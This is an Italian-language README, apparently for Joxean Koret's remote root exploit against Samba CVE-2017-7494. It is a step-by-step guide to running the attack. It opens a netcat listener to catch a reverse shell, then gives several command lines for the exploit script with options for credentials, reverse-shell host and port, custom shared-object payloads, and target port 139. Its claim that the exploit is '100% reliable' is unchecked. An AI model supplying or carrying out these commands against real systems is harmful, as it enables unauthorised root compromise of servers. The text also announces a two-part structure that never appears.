
Exploit root remoto per la vulnerabilità SAMBA CVE-2017-7494.
Questo exploit è diviso in 2 parti:
Finché il target è vulnerabile e il payload è corretto per il sistema operativo e l'architettura del target, l'exploit è affidabile al 100%.
Sulla tua macchina, esegui il seguente comando:
$ nc -p 31337 -l
Poi, esegui l'exploit contro il tuo target e attendi che si ricolleghi al tuo Netcat:
$ python cve_2017_7494.py -t target_ip
Se chiudi troppo in fretta la reverse shell, invece di eseguire di nuovo l'exploit che carica il modulo, ecc... puoi semplicemente passare il percorso del modulo che ha già caricato. Supponendo che sia stato caricato in /shared/directory/ come "module.so", eseguirai un comando come il seguente:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Ora puoi eseguire di nuovo l'exploit contro Samba 3.5.0 e 3.6.0, devi solo aggiungere l'argomento -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Ora puoi usare il tuo .so personalizzato
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
Nel caso tu debba eseguire questo script da una macchina x86, la compilazione dei binari implant creerà due file x86. Usando il flag -n 1 puoi disabilitare la compilazione e copiare libimplantx64.so da un'altra macchina.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Nel caso in cui Samba giri solo sulla porta 139. Puoi impostare la porta del server remoto usando l'argomento -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Non lo supporto più.
-- Joxean Koret